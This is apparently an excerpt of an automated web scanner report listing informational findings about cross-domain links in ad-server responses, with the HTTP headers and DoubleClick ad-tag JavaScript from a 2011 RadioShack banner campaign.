http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1043697033?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1043697033?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1043697033?

Request

Response

17.131. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2037650882?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2037650882?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:03:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2037650882?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2037650882?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.132. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=334085935?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=334085935?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=334085935?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=334085935?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.133. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1360207430?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?
http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1360207430?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3186
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1360207430?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1360207430?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.134. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=169827066?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?
http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=169827066?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=169827066?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=169827066?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.135. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=138763220?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?
http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=138763220?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=138763220?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=138763220?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.136. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?
